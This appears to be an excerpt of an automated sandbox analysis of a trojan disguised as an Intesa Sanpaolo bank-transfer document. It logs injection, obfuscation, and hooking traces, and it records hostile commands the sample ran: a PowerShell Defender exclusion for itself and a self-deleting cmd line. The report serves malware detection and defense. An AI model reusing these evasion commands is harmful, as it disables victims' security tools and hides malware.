          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.6c30000.9.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.2a647e4.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.2720108.4.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.2730120.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: classification engineClassification label: mal100.troj.evad.winEXE@13/7@10/8
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_002238B0 HeapSetInformation,StrCmpICW,CompareStringOrdinal,CompareStringOrdinal,CoTaskMemFree,StrCmpICW,IsOS,CompareStringOrdinal,StrCmpICW,StrCmpICW,lstrlenW,AllowSetForegroundWindow,ShellExecuteExW,CoInitializeEx,CoCreateInstance,CoUninitialize,8_2_002238B0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.log
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tw1qdhoc.n05.ps1
          Source: C:\Windows\SysWOW64\control.exeCommand line argument: F"8_2_00224630
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeReversingLabs: Detection: 78%
          Source: unknownProcess created: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess created: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess created: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, textshaping.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, windowscodecs.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, amsi.dll, userenv.dll, profapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll
          Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll, vcruntime140_1.dll, vcruntime140.dll, msvcp140.dll, windows.internal.shell.broker.dll, mfsrcsnk.dll
          Source: C:\Windows\SysWOW64\control.exe Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: control.pdb source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1423184745.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1421108416.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, control.exe, control.exe, 00000008.00000002.3765131140.0000000000220000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.1421198308.00000000043EE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.1423117793.000000000459B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, control.exe, control.exe, 00000008.00000003.1421198308.00000000043EE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.1423117793.000000000459B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdbUGP source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1423184745.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1421108416.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.3765131140.0000000000220000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: BIze.pdbSHA256 source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
          Source: Binary string: BIze.pdb source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe

          Data Obfuscation

          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Form1.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.6c10000.8.raw.unpack, LoginForm.cs .Net Code: _206F_206A_200D_200E_206C_200D_200E_206E_202D_200F_202D_206D_200D_206C_206C_206D_200C_202B_200C_202D_202A_200B_202B_202E_206E_202C_202E_202D_200E_200E_200D_202A_206F_200F_206B_206A_200E_200E_206B_202B_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, tydX84t5EsHI9QvB2T.cs .Net Code: dNJft2ekpp System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.26e797c.6.raw.unpack, LoginForm.cs .Net Code: _206F_206A_200D_200E_206C_200D_200E_206E_202D_200F_202D_206D_200D_206C_206C_206D_200C_202B_200C_202D_202A_200B_202B_202E_206E_202C_202E_202D_200E_200E_200D_202A_206F_200F_206B_206A_200E_200E_206B_202B_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, tydX84t5EsHI9QvB2T.cs .Net Code: dNJft2ekpp System.Reflection.Assembly.Load(byte[])
          Source: 7.2.explorer.exe.100af840.0.raw.unpack, Form1.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Static PE information: 0x9ED14E62 [Mon Jun 8 07:40:18 2054 UTC]
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Code function: 0_2_06C092C8 pushfd ; ret 0_2_06C092C9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Code function: 0_2_06C09AD8 push eax; retf 0_2_06C09AD9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Code function: 0_2_073BB35D push FFFFFF8Bh; iretd 0_2_073BB35F
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Code function: 6_2_0040E33E pushfd ; retf 6_2_0040E3A2
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Code function: 6_2_0040E39D pushfd ; retf 6_2_0040E3A2
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Code function: 6_2_0040E440 push FFFFFF8Bh; ret 6_2_0040E45E
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Code function: 6_2_0041D4B5 push eax; ret 6_2_0041D508
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Code function: 6_2_0041D56C push eax; ret 6_2_0041D572
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Code function: 6_2_0041D502 push eax; ret 6_2_0041D508
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Code function: 6_2_0041D50B push eax; ret 6_2_0041D572
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Code function: 6_2_0109225F pushad ; ret 6_2_010927F9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Code function: 6_2_010927FA pushad ; ret 6_2_010927F9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Code function: 6_2_010C09AD push ecx; mov dword ptr [esp], ecx 6_2_010C09B6
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Code function: 6_2_0109283D push eax; iretd 6_2_01092858
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Code function: 6_2_0109B008 push es; iretd 6_2_0109B009
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Code function: 6_2_01091344 push eax; iretd 6_2_01091369
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Code function: 6_2_01099939 push es; iretd 6_2_01099940
          Source: C:\Windows\explorer.exe Code function: 7_2_0C3BC9B5 push esp; retn 0000h 7_2_0C3BCAE7
          Source: C:\Windows\explorer.exe Code function: 7_2_0C3BCB1E push esp; retn 0000h 7_2_0C3BCB1F
          Source: C:\Windows\explorer.exe Code function: 7_2_0C3BCB02 push esp; retn 0000h 7_2_0C3BCB03
          Source: C:\Windows\explorer.exe Code function: 7_2_0C614B02 push esp; retn 0000h 7_2_0C614B03
          Source: C:\Windows\explorer.exe Code function: 7_2_0C614B1E push esp; retn 0000h 7_2_0C614B1F
          Source: C:\Windows\explorer.exe Code function: 7_2_0C6149B5 push esp; retn 0000h 7_2_0C614AE7
          Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_0022486D push ecx; ret 8_2_00224880
          Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_047809AD push ecx; mov dword ptr [esp], ecx 8_2_047809B6
          Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_0253E33E pushfd ; retf 8_2_0253E3A2
          Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_0253E39D pushfd ; retf 8_2_0253E3A2
          Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_0253E440 push FFFFFF8Bh; ret 8_2_0253E45E
          Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_0254D4B5 push eax; ret 8_2_0254D508
          Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_0254D56C push eax; ret 8_2_0254D572
          Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_0254D502 push eax; ret 8_2_0254D508
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Static PE information: section name: .text entropy: 7.94939514943548
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, FQ4eefKL8pRDvyPaah.csHigh entropy of concatenated method names: 'KOXjgTcx8k', 'FMvjcmQO5U', 'fqLjnrMUQ6', 'EmejWcFXOs', 'tXhjSldnli', 'm0sj0jIJSi', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, NN6GgoPWZW7GllWdhcd.csHigh entropy of concatenated method names: 'GCpAXd6hKW', 'RKWAHb7XOT', 'YMeAtZGQO7', 'EhwA7J2lBW', 'tFmAUnga3A', 'jKOABU4rYv', 'vfhADDdPBN', 'vGJATKy2w5', 'O26Au9VEvW', 'z54AVaP9vm'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, nuMIltTApwhZGENp9S.csHigh entropy of concatenated method names: 'yhEhKuVGJ6', 'Yd9h4uBYIA', 'ToString', 'd9vhG2xe0m', 'AQ4h64g8qi', 'kgshYl8ALC', 'dTVhaY4Ulo', 'hflhMXDH8Z', 'NpOh125t8b', 'mGwhwA13Iu'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, bbjpR9UOTFUkhTmjMm.csHigh entropy of concatenated method names: 'Dispose', 'PFR9EJcKcn', 'J70kci1ey6', 'sEpOOByjkG', 'ovO9PswwWd', 'XQm9z2qiUj', 'ProcessDialogKey', 'jXWk8hA3ZF', 'WE9k9yMExw', 'mcukkw8kYG'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, Tkw3MhzJhNFuRODPVZ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HipAL4rUxd', 'XNaA5kGcpS', 'G9CAdH2kCh', 'kTyAhl1ja5', 'k9hAjCk5w5', 'FlpAAcZbVK', 'mo6AbW12Zp'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, tydX84t5EsHI9QvB2T.csHigh entropy of concatenated method names: 'qrjQJvUbCV', 'AJEQGN4Yme', 'XuGQ6pNabx', 'hHAQYHZoVk', 'GHUQaPydqc', 'mehQMMflSi', 'oOPQ1qORyi', 'FMNQwuWaiQ', 'PsOQI60yiV', 'frXQKQidU9'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, gG2kq7MUE2irokerRM.csHigh entropy of concatenated method names: 'GtKjG95b6t', 'jODj60NdvR', 'AqgjYmv48K', 'HX4ja7DmX2', 'b7ujMF67qn', 'mOsj1YCGwr', 'bm1jwakH9t', 'RcmjI7Iy9v', 'nkNjKO9vaq', 'jWFj4Sl4Jg'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, vUfHMCwEUOayslgN8D.csHigh entropy of concatenated method names: 'U3Z915KpnJ', 'GbE9wO1Dc4', 'FEP9KtxWeE', 'sIZ94SYsXU', 'PV9959O3eD', 'MbB9dns85K', 'lRhDoXnlE7NXU0mut9', 'mA5BVmrX4bBa6XJk8R', 'hyS99h8osy', 'E4g9QcBDkd'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, I3iamc4cGrnmlMG0AU.csHigh entropy of concatenated method names: 'nNnMJweO33', 'tKyM6udW66', 'dwJMaUuexi', 'WHJM1Q8KK6', 'xbDMwFEUyB', 'Ro2aenIqYs', 'rjwaZ1yKKv', 'M4EaxvphuG', 'SexaqDF05x', 'a67aE5GDK9'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, ImbTOCPbUTsJm8KAqxb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XI9bSWiSbO', 'SMcbiYUWFQ', 'cLWbRkSOhv', 'XRUb2Lwx14', 'v6qbefPYWA', 'qsIbZeZLwQ', 'csqbxhE9ZD'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, uki9Ae12eJJgBNuklg.csHigh entropy of concatenated method names: 'v4sA9pSxde', 'vj4AQahem0', 'tmGAfjJEt5', 'gAPAG0dXsw', 'wKaA6lb49e', 'bZjAaw9Tpw', 'T0CAMPgbwT', 'LFUjxg3wq1', 'p9wjqbyEOw', 'luSjEYMruE'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, yVWN9ifYkhERJOAQN3.csHigh entropy of concatenated method names: 'tu06S7Awfh', 'iCI6iZU4NH', 'JIW6RFTw7i', 'PIa62evkKZ', 'Hqy6eZ75Rx', 'wBv6ZitD9P', 'gjr6xLjSBm', 'Fpc6qnQvf4', 'cCg6EeqWrO', 'eAn6PKxBLB'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, CDAoPHZ9q3tdiP011t.csHigh entropy of concatenated method names: 'n2B1XrxRAM', 'kWF1HViKPj', 'Siy1txaY9P', 'dSC17TYrx5', 'XXt1UpwND4', 'ne31BmEae9', 'nUe1DjtfOs', 'eNK1TI7q98', 'ptm1ugBwkf', 'PYq1VaMcyd'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, GLlj4952WZgTQHSi3S.csHigh entropy of concatenated method names: 'C7G5lEAfal', 'Va75r80Hb0', 'gLp5SOUOJt', 'Amy5iGMrJy', 'EOR5ceWH3G', 'yDH5nJR0sp', 'Ki15WV2HE8', 'UTA50oif78', 'KJx5NSIi3E', 'BDE5yV4HAk'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, yuejDsaqCbYW8uLHlU.csHigh entropy of concatenated method names: 'jGQY7b7vKZ', 'vgwYBAajwQ', 'vcaYT538Eh', 'UpXYuJiMHa', 'k1cY5F0djS', 'yS3YdYV4oa', 'sB4YhrNhgI', 'aJfYjYXikS', 'pgWYAXBwNd', 'tNkYbxFc9M'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, FeH1cnrs2WoFWBEwpG.csHigh entropy of concatenated method names: 'KxtLTY89fP', 'wSALuc9IFD', 'er4Lgpn4QN', 'uR0LcpjTRT', 'EKyLWdDbDi', 'psIL0vsLDW', 'SQdLyvKHoC', 'zMmLoD2i78', 'D7MLlZFORE', 'FYiLFgf9um'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, ii0mTlDFpgEWRQTa4g.csHigh entropy of concatenated method names: 'dFTtu0k2f', 'CkB77ho5r', 'X2YBsyFTq', 'SvWDHfArq', 'iEFuLuOnc', 'xZKVNHjbg', 'oGj03wwjatByIhWiUq', 'a1cfKVVU6iHmLK6dUL', 'AnpjPbx8J', 'KoVbpV8wj'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, VugkCMjxUJUiqN9Ekd.csHigh entropy of concatenated method names: 'YAXhqkMMKm', 'PSEhPGr6EG', 'Etgj89w140', 'IW4j9vxxLb', 'lr8hFW6AxZ', 'vfuhrWWa5C', 'qoBhm8fu4f', 'd0ihSQIexV', 'OrehiRLE8f', 'et1hRoOd4P'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, JAb5mcifBkCyPIWWAv.csHigh entropy of concatenated method names: 'wSmaUlrVd6', 'IRRaDKKvDs', 'krXYn6QEfh', 'zGJYWTbssx', 'N22Y09ACIf', 'CwCYNy94CT', 'p55YyVXgvP', 'S4VYo3eKX8', 'H1iYsYbk1X', 'tIwYluhuay'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, D6vJMZRNi3eJN1nVKI.csHigh entropy of concatenated method names: 'M251G5sDV2', 'QkD1YtldVB', 'CvR1MFe9Ib', 'A8sMPxpcg6', 'jvqMzFrbYd', 'rg118xDIYG', 'v4t19cawbu', 'GCJ1kt8HJ6', 'PY31QGtt1X', 'y321fWPVnj'
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe File created: \documento di bonifico bancario intesa sanpaola 20240613 eur23750.exe

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xEA
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Yara match File source: Process Memory Space: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe PID: 7532, type: MEMORYSTR
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe API/Special instruction interceptor: Address: 7FFEFE52D324
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe API/Special instruction interceptor: Address: 7FFEFE530774
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe API/Special instruction interceptor: Address: 7FFEFE530154
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe API/Special instruction interceptor: Address: 7FFEFE52D8A4
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe API/Special instruction interceptor: Address: 7FFEFE52DA44
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe API/Special instruction interceptor: Address: 7FFEFE52D1E4
          Source: C:\Windows\SysWOW64\control.exe API/Special instruction interceptor: Address: 7FFEFE52D324
          Source: C:\Windows\SysWOW64\control.exe API/Special instruction interceptor: Address: 7FFEFE530774
          Source: C:\Windows\SysWOW64\control.exe API/Special instruction interceptor: Address: 7FFEFE52D944
          Source: C:\Windows\SysWOW64\control.exe API/Special instruction interceptor: Address: 7FFEFE52D504
          Source: C:\Windows\SysWOW64\control.exe API/Special instruction interceptor: Address: 7FFEFE52D544
          Source: C:\Windows\SysWOW64\control.exe API/Special instruction interceptor: Address: 7FFEFE52D1E4
          Source: C:\Windows\SysWOW64\control.exe API/Special instruction interceptor: Address: 7FFEFE530154
          Source: C:\Windows\SysWOW64\control.exe API/Special instruction interceptor: Address: 7FFEFE52D8A4
